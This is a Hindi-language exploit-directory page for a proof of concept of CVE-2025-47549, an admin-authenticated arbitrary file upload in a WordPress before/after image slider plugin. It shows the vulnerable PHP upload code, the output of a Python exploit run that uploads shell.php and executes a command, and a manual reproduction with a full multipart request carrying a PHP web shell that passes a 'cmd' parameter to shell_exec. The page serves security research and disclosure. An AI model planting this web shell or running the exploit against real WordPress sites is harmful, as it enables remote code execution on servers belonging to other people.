Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-47549 — Ultimate Before After Image Slider & Gallery – BEAF <= 4.6.10 - प्रमाणित (Admin+) मनमाना फ़ाइल अपलोड beaf_options_save के माध्यम से | Kitploit
उपकरण/GitHubGitHub/d0n601/cve-2025-47549
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubd0n601/cve-2025-47549

CVE-2025-47549

Ultimate Before After Image Slider & Gallery – BEAF <= 4.6.10 - प्रमाणित (Admin+) मनमाना फ़ाइल अपलोड beaf_options_save के माध्यम से

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Ultimate Before After Image Slider & Gallery – BEAF <= 4.6.10 - beaf_options_save के माध्यम से प्रमाणीकृत (एडमिन+) मनमानी फ़ाइल अपलोड

यह Ultimate Before After Image Slider & Gallery प्लगइन beaf_options_save एक्शन के फ़ाइल प्रकारों को सैनिटाइज़ नहीं करता है, जिससे एडमिनिस्ट्रेटर या उससे ऊपर के उपयोगकर्ता मनमानी फ़ाइलें अपलोड कर सकते हैं और संभावित रूप से सर्वर पर कोड निष्पादन प्राप्त कर सकते हैं।

TL;DR एक्सप्लॉइट्स

  • एक POC CVE-2025-47549.py प्रदान किया गया है जो एक एडमिनिस्ट्रेटर द्वारा shell.php नामक वेब शेल अपलोड करने का प्रदर्शन करता है।
root@kitploit:~
python3 CVE-2025-47549.py https://lab1.hacker admin PASSWORD
Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
Uploading web shell: shell.php
{"status":"success","message":"Options saved successfully!"}
Web Shell Location: https://lab1.hacker/wp-content/uploads/itinerary-fonts/shell.php

Executing test command: ip addr
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 68200sec preferred_lft 68200sec
    inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 86113sec preferred_lft 14113sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:e5:9e:f6:23 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>

विवरण

beaf_options_save एक्शन, /wp-content/plugins/beaf-before-and-after-gallery/admin/tf-options/classes/BEAF_Settings.php की लाइन 227 पर beaf_save_options() फ़ंक्शन को बिना किसी फ़ाइल प्रकार सत्यापन लागू किए कॉल करता है।

इस फ़ंक्शन की लाइनें 281-292 HTTP अनुरोध में $_FILES की जाँच करती हैं और माइम प्रकार को केवल एक सामान्य application/octet-stream के विरुद्ध सत्यापित करती हैं। यह फिर फ़ाइल को वेब-सुलभ निर्देशिका /wp-content/uploads/itinerary-fonts में संग्रहीत करता है।

root@kitploit:~
    if ( isset( $_FILES ) && ! empty( $_FILES['file'] ) ) {
        $tf_upload_dir = wp_upload_dir();
        if ( ! empty( $tf_upload_dir['basedir'] ) ) {
            $tf_itinerary_fonts = $tf_upload_dir['basedir'] . '/itinerary-fonts';
            if ( ! file_exists( $tf_itinerary_fonts ) ) {
                wp_mkdir_p( $tf_itinerary_fonts );
            }
            $tf_fonts_extantions = array( 'application/octet-stream' );
            for ( $i = 0; $i < count( $_FILES['file']['name'] ); $i++ ) {
                if ( in_array( $_FILES['file']['type'][ $i ], $tf_fonts_extantions ) ) {
                    $tf_font_filename = $_FILES['file']['name'][ $i ];
                    move_uploaded_file( $_FILES['file']['tmp_name'][ $i ], $tf_itinerary_fonts . '/' . $tf_font_filename );
                }
            }
        }
    }

मैन्युअल रिप्रोडक्शन

  1. एडमिन पैनल में लॉगिन करें और Before and After Slider -> Settings पर नेविगेट करें।

    • उदाहरण: https://lab1.hacker/wp-admin/edit.php?post_type=bafg&page=beaf_settings
  2. Burp Suite या समान टूल शुरू करें और ट्रैफ़िक इंटरसेप्ट करना शुरू करें।

  3. निचले दाएं कोने में स्थित Save बटन पर क्लिक करें।

test1

  1. Burp में POST अनुरोध को इंटरसेप्ट करें, और अपना स्वयं का फ़ाइल डेटा जोड़ें (सुनिश्चित करें कि आप सही फ़ॉर्म बाउंड्री का उपयोग करते हैं)।
root@kitploit:~
------WebKitFormBoundarydAJeoqdwR5qxfDb1
Content-Disposition: form-data; name="file[]"; filename="shell.php"
Content-Type: application/octet-stream

<?php
// Silence is golden
if (!empty($_GET['cmd'])) {
    echo "<pre>".shell_exec($_GET["cmd"])."</pre>";
}
------WebKitFormBoundarydAJeoqdwR5qxfDb1--
  1. फ़ॉर्म डेटा वाले अगले अनुरोध को संशोधित करें ताकि फ़ाइल का नाम poc.php सेट हो जाए:

test2

  1. प्रूफ ऑफ कॉन्सेप्ट निष्पादित करने के लिए https://lab1.hacker/wp-content/uploads/itinerary-fonts/shell.php पर नेविगेट करें।

test3

टूल डाउनलोड करें